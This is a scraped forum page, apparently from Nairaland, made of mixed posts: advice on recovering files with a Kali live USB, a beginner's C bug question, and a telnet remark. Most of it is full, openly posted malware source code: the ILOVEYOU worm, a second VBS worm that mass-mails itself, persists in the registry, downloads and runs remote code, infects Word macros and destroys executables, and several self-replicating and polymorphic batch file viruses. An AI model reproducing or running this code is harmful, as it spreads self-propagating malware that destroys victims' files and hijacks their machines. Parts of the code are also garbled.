₦airaland Forum

Well, it would be helpful if you could have mentioned what OS/version you are running, I will go ahead and assume that you are on Windows. This technique will work for most any operating system, though. If there are files on the disk that you need to recover, then it is actually pretty easy to get ahold of them without even booting into Windows. What you need to do is go on another computer and go to kali.org, and download the Kali Linux .iso file. Make sure that you are getting the right one, if you get a 64 bit file for a 32 bit system then you are screwed, so be sure and get the one that is compatible with your hardware. If you do not know whether you are on a 32 or 64 bit system, you can look on the computer next to the keyboard, there are usually stickers that say this. Once you have the Kali .iso file, burn it to a DVD or USB drive, either one will work. Be sure to burn it as an image instead of burning the files. If you are on a *nix system, you can run this command from a terminal to burn it quickly and easily without installing anything: dd if=~/path_to_kali.iso of=/dev/disk2s1 bs=512k conv=noerror,sync. Replace ~/path_to_kali.iso with the actual location of the Kali Linux iso file that you downloaded, and replace /dev/disk2s1 with the device node for your USB/DVD. If you are on Windows then you will need to use burning software I think. Now take your drive with Linux on it and shut down the computer, put the drive in and reboot while holding down F12 to enter the BIOS boot menu. Select your USB/DVD drive from the menu and then hit enter to boot from it. If everything went well, you should now be greeted by a red and blue screen with several options on it. Select the one that says something like Live Usb Install (Persistence), and hit enter again, and boot into Kali.

So now you can go ahead and click the icon on the desktop that says Computer. On the top left it should have a list of other volumes on the disk. One of those is your operating system with all of the files that you need on it. Double click on that, and find the files that you need, and save them to your USB stick/DVD drive.

Now, you can reinstall Windows (or if you like, you can get your hands on a good Unix/Linux system, I recommend Debian ;] ), and once that is done, just boot into Kali again and transfer your files back onto your hard disk. Kind of a hassle, but short of something like bruteforcing the admin password, which would take ages and ages and probably kill your CPU, or something like resetting the NVRAM, which might or might not affect the actual OS, I don't really see how else to get back in. How the hell did you manage to forget your own password anyway? Unless you are like me, and make twenty-five character passwords because you are paranoid, I don't see how it could happen. Probably a good idea to have two or even three admin accounts for redundancy, so there is a greater chance that you will remember the pass for at least one of them and not be locked out forever, like you are now.

Before you run off and format your disk, though, let me give you a little advice. Sit down in a nice quiet room for a minute, and close your eyes. Try to clear your mind of any and all distractions or errant thoughts. Now start to think about your computer. Focus your mind on that time when you last changed your password. What were you thinking? What was going through your head? Slowly become aware of the password returning to your memory. You remember now! It all becomes clear! You changed it to "icanhazpasswordz" late last Wednesday night!

No but really, see if you can remember it XD. Good luck with your password troublez.

Google. The greatest hacking tool out there.......

So I started learning C like a week ago, and I for the life of me cannot figure out how to fix this simple script that I am writing. It is supposed to output the contents of a file with line numbers added, but what it does is just prints this:

1: MasterOfTheUniverse:~ syntax3rror$

Here are my codez:

#include <stdio.h>
#include <stdlib.h>

void display_usage(void);

int line;

main(int argc, char *argv[])
{
char buffer[256];

FILE *fp;

if( argc < 2 )
{
display_usage();

exit(1);
}

if (( fp = fopen( argv[1], "r" )) == NULL )
{
fprintf( stderr, "Error opening file, %s!", argv[1] );

exit(1);
}

line = 1;

while( 1 == 1 )
{
fprintf( stdout, "%d:\t%s", line++, buffer );

fclose(fp);

return 0;
}
}

void display_usage(void)
{
fprintf(stderr, "\nProper Usage is: " );

fprintf(stderr, "\n\n/list filename.ext\n" );
}

I am pretty sure that the bug is on line 30, while( 1 == 1 ). Previously that line was while( fgets( buffer, 256, fp ) != NULL ), but then I had a different bug, it just printed the first line and then stopped, I think because it encountered the null char at the end of the line and thought it was a null pointer. Dumb little compiler. I considered just making it so that you would have to put a certain EOF character at the end of the file to tell it to stop, but then that would be cheating since you would have to modify the file. I don't even know why while( 1 == 1) won't work, it should always evaluate to true and then it keeps looping through the file until it reaches the end, right? But that wasn't what it did. I am kind of confused right now?

this is another good one:

set shellobj = CreateObject("WScript.Shell" shellobj.run "notepad" shellobj.sendkeys "YOU " wscript.sleep 1000 shellobj.sendkeys "HAVE " wscript.sleep 1000 shellobj.sendkeys "BEEN " wscript.sleep 1000 shellobj.sendkeys "PWNED." wscript.sleep 1000 shellobj.sendkeys "{ENTER}" wscript.sleep 4000 shellobj.sendkeys "{ALT+F4}"

(written by me ^^ )

**the full ILOVEYOU source code:**

On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq=”” ctr=0 Set fso = CreateObject(“Scripting.FileSystemObject”) set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject(“WScript.Shell”) rr=wscr.RegRead(“HKEYCURRENTUSER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”) if (rr>=1) then wscr.RegWrite “HKEYCURRENTUSER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,0,”REGDWORD” end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&”\MSKernel32.vbs”) c.Copy(dirwin&”\Win32DLL.vbs”) c.Copy(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate “HKEYLOCALMACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 “,dirsystem&”\MSKernel32.vbs” regcreate “HKEYLOCALMACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL”,dirwin&”\Win32DLL.vbs” downread=”” downread=regget(“HKEYCURRENTUSER\Software\Microsoft\Internet Explorer\Download Directory”) if (downread=”“) then downread=”c:” end if if (fileexist(dirsystem&”\WinFAT32.exe”)=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe” elseif num = 2 then regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe” elseif num = 3 then regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN-BUGSFIX.exe” elseif num = 4 then regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe” end if end if if (fileexist(downread&”\WIN-BUGSFIX.exe”)=0) then regcreate “HKEYLOCALMACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X”,downread&”\WIN-BUGSFIX.exe” regcreate “HKEYCURRENTUSER\Software\Microsoft\Internet Explorer\Main\Start Page”,”about:blank” end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&”“) end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext=”vbs”) or (ext=”vbe”) then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”) or (ext=”hta”) then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&”“&bname&”.vbs”) fso.DeleteFile(f1.path) elseif(ext=”jpg”) or (ext=”jpeg”) then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&”.vbs”) fso.DeleteFile(f1.path) elseif(ext=”mp3”) or (ext=”mp2”) then set mp3=fso.CreateTextFile(f1.path&”.vbs”) mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or (s=”script.ini”) or (s=”mirc.hlp”) then set scriptini=fso.CreateTextFile(folderspec&”\script.ini”) scriptini.WriteLine “[script]” scriptini.WriteLine “;mIRC Script” scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt, if mIRC will” scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run correctly. thanks” scriptini.WriteLine “;” scriptini.WriteLine “;Khaled Mardam-Bey” scriptini.WriteLine “;http://www.mirc.com” scriptini.WriteLine “;” scriptini.WriteLine “n0=on 1:JOIN:#:{” scriptini.WriteLine “n1= /if ( $nick == $me ) { halt }” scriptini.WriteLine “n2= /.dcc send $nick “&dirsystem&”\LOVE-LETTER-FOR-YOU.HTM” scriptini.WriteLine “n3=}” scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject(“WScript.Shell”) regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject(“WScript.Shell”) regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject(“WScript.Shell”) set out=WScript.CreateObject(“Outlook.Aplication”) set mapi=out.GetNameSpace(“MAPI”) for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead(“HKEYCURRENTUSER\Software\Microsoft\WAB”&a) if (regv=”“) then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad=”” regad=regedit.RegRead(“HKEYCURRENTUSER\Software\Microsoft\WAB”&malead) if (regad=”“) then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = vbcrlf&”kindly check the attached LOVELETTER coming from me.” male.Attachments.Add(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send regedit.RegWrite “HKEYCURRENTUSER\Software\Microsoft\WAB”&malead,1,”REGDWORD” end if x=x+1 next regedit.RegWrite “HKEYCURRENTUSER\Software\Microsoft\WAB”&a,a.AddressEntries.Count else regedit.RegWrite “HKEYCURRETNUSER\Software\Microsoft\WAB”&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1=”LOVELETTER - HTML

Compare this to format C:\

.........

I have to point out that no matter how hard you try to obscure your source code, anyone who is smart enough to use Telnet can get it anyway, unless you disable it. i am fairly sure about how you disable it on a linux server:

# grep /etc/xinetd.d/telnet disable=no

#nano /etc/xinetd.d/telnet

and change disable=no to disable=yes. idk how to do it on a windows server ^.^

Whoops, looks like the XSS filter messed up the code..... just put a close paren ) wherever there are those green face things.

https://www.nairaland.com/1923505/create-harmful-computer-virus-using#26681912

It won't let me reply to it since I have not been here very long, but it really got under my skin, all of the people out there that have a windows machine and know like 3 batch commands and don't even know any VB or anything and think they are master virus writers and the 3l33t king of the universe simply because they can write a batch file that will be caught by any AV that is <20 years old. Literally.

Well. I have news for you.

'Serial Number : 0.7055475
'
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject"
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs"
f.Copy ("c:\folder\subfolder\...\anyname.vbs"
f.Copy ("c:\attachment.vbs"
f.Copy ("c:\attachment1.vbs"
end sub
mail()
sub mail()
Set a = CreateObject("Outlook.Application"
Set b = a.GetNameSpace("MAPI"
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell"
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet"
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject"
set f = fso.CreateTextFile("c:\update.vbs"
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell"
a.run ("c:\update.vbs"
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject"
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini"
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject""" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject"
set f = fso.createtextfile("c:\try.txt"
f.write norm
f.Close
Set oword = CreateObject("Word.Application"
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject"
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & ""
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject"
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe" Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs"
fso.deletefile(f1.path)
End If
If (s = "freecell.exe" Or (s = "readme.txt" or (s = "license.txt" Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe" Or (ext = "bat" Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs"
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject"
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell"
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
msgbox "INFECTED", ,"DOOM"

@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug<PiFV$$>nul
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
%hjmmt% set ff=createobject("scripting.filesystemobject">>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit

#viruses written by zer0 cool
#https://es-la.facebook.com/pages/Hacker-Zero-Cool/136665923038602

You are forgetting someone.... Carolyn Meinel, she is one of the greatest hackers out there, she wrote this book the happy hacker and made this site happyhacker.org. Some people (http://attrition.org/errata/charlatan/shame/index2.html) don't like her, but I think she is awesome, she has been very helpful to me on multiple occasions.